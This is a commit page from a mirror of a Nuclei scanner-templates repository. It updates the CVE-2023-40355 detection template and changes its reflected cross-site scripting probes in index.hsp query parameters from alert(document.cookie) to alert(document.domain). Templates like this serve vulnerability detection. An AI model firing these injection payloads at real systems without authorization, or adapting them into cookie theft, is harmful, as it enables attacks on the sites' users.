daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

payload update

patch-1
Ritik Chaddha 2024-02-15 14:59:27 +05:30 committed by GitHub
parent d4a1db8b54
commit c6168b1d23
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 5 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
http/cves/2023/CVE-2023-40355.yaml
View File

@ -25,9 +25,9 @@ info:
http:
- method: GET
path:
- "{{BaseURL}}/index.hsp?passwordExpired=yes&username=\\'-alert(document.cookie),//"
- "{{BaseURL}}/index.hsp?passwordExpired=yes&domainName=\\'-alert(document.cookie),//"
- "{{BaseURL}}/index.hsp?m=',alert(document.cookie),'"
- "{{BaseURL}}/index.hsp?passwordExpired=yes&username=\\'-alert(document.domain),//"
- "{{BaseURL}}/index.hsp?passwordExpired=yes&domainName=\\'-alert(document.domain),//"
- "{{BaseURL}}/index.hsp?m=',alert(document.domain),'"
stop-at-first-match: true
matchers-condition: and
@ -35,8 +35,8 @@ http:
- type: word
part: body
words:
- "\\\\'-alert(document.cookie),//"
- "',alert(document.cookie),'"
- "\\\\'-alert(document.domain),//"
- "',alert(document.domain),'"
condition: or
- type: dsl